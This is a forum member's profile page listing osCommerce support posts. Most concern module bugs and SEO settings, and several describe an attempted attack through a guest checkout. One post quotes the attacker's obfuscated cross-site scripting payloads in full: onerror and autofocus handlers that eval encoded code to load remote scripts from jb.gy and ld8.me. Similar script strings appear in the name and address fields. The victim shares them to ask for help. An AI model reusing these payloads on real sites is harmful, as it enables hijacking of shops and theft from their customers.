Jump to content
Latest News: (loading..)

puggybelle

Members
  • Content count

    1,037
  • Joined

  • Last visited

About puggybelle

  • Birthday 08/02/1966

Profile Information

  • Real Name
    Andrea
  • Gender
    Female
  • Location
    Central North Carolina
  • Website

Recent Profile Visitors

11,426 profile views
  1. puggybelle

    Hack attempt - is there a way to prevent this?

    Okay, here's where I'm at. Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them. No new files had been added to the website. And just encouragement to upgrade my installation to the 'frozen' version, I think it's called. And that's what I thought I had! Oh, well. Work to do but it didn't turn out to be a disaster. Think I will give View Counter another look, though... If I have to block half the world, I'll do it! Thanks everybody! - Andrea
  2. puggybelle

    Hack attempt - is there a way to prevent this?

    They checked out using the checks/money order selection so no worries about payment or delivery. And I sincerely hope that this is a one-off thing and all will be well. I have contacted my webhost with full details and am awaiting a response now. Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it. This crap is really scary, you know? Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now. I haven't the faintest idea how to go about manually cleaning the database. Hopefully, they'll find nothing and I can forget about it. My host does NOT offer country blocking. I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter. In retrospect, it should have been the other way around. I now use Ultimate SEO URLs. Live and learn, I guess. I'll post back with any response I get from the webhost. Hopefully, everything is okay. Thanks all! - Andrea
  3. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc Well, this is just a mess! My core code has been modified substantially, so...I have a lot to think about now. But, Thank You for helping! @Jack_mcs Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form. The part where buyers can add any additional comments with their purchase. But, the < > tags have been stripped. Looks like this: _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_ It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. I bet someone in this forum knows... I will take comfort in knowing that the code is being sanitized and just leave it at that. This hacker nonsense is crazy and worse then ever. Thanks to everyone who posted - I appreciate it very much! - Andrea
  4. puggybelle

    Hack attempt - is there a way to prevent this?

    Is there anything I need to do? When I run Version Checker in Admin, it comes back with: - Andrea
  5. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc I downloaded a package that is dated May 24, 2018 called Responsive - osCommerce - master - Andrea
  6. puggybelle

    Hack attempt - is there a way to prevent this?

    I always forget to say which version I'm using. I'm using 2.3.4.1 CE with the latest version of PWA. - Andrea
  7. puggybelle

    Hack attempt - is there a way to prevent this?

    Can you be a little more specific? I deleted the order - no account existed. I found some interesting info online when searching a bit deeper. The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. Google the phrase Linda Juan Fraud and see what comes up. Guess it was just my turn! Hope they send cash... - Andrea
  8. Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually): Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_ Ithaca Ithaca, New York 98765 United States I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable: A message that you sent contained one or more recipient addresses that were incorrectly constructed: "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<") This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible. Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks! - Andrea
  9. Function keys section at the bottom of Includes > Modules > Content > Product_Info > cm_pi_date_available.php is missing an entry for Available Style in the Date Available module. 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE',
  10. Hi Zahid, Should I just provide a link to the thread I created above or write a brand new post in that one? Looks like it's still active, last post dated November 29th. - Andrea
  11. Stumbled on a file that appears to be missing a line of code. Catalog > Includes > Modules > Content > Product_Info > cm_pi_date_available.php Bottom of the file reads: function keys() { return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER'); It's missing the entry for Available Style, which controls the appearance of the date format. Should look like this: function keys() { return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER'); I stumbled on it after trying to figure out how to change the date format that was being output on my products. I don't know who is responsible for maintaining the downloads of osCommerce, but I thought I should pass this on so it can be corrected. Makes life a little easier when setting up the module. - Andrea
  12. Sorry...make that includes/modules/new_products.php - Andrea
  13. I've searched for help with this and saw several people asking for help with it over the years, but no replies. At present, if I put an item on sale...only the sale price will appear in the New Products module on the homepage. I'd like it to appear as it does in the Specials box....original price, with a strike thru it, followed by the new sale price in red. Tried several things in includes/modules/products_new.php but nothing I do is working out. Can someone point me in the right direction, please? - Andrea
  14. @Jack_mcs I'm sorry. This is what happens when posting late at night. I have a question about the Reset SEO URLs Cache feature. Is that something that should be done every so often or only when you have a problem? I remember installing this and some things were not working and when I did that, it cleared up all of my trouble immediately. Should I use that feature on a regular basis or let it sit? Thank You! - Andrea
  15. @Jack_mcs I don't believe there was a wonky character in the title. All of my titles are the same, in the way they're formatted. Just numbers and text. I'm going to hope that it was one of those crap moments I experienced with my webhost until they put me on a different server when I raised hell. My item descriptions that I migrated over from 2.2 were loaded with css code that was killing the extra description from appearing when browsing by category. I've been manually editing and stripping that code for a couple of months now, one item at a time in Admin. Got thru 100 or so today. It's ongoing. I'm clicking around fast and furious and I haven't run into it again, so...I just have to hope it was one of those abrupt disconnects in the past that may have somehow whacked that item. I'll never know and that blows. Hope I don't see anymore of it. Thanks for the explanation of the uninstall. I took that entry literally...like, UNINSTALL. WIPE IT OUT. And start over if you wish to have it. Oh, well. It's a great tool and I'm glad to have it! - Andrea
×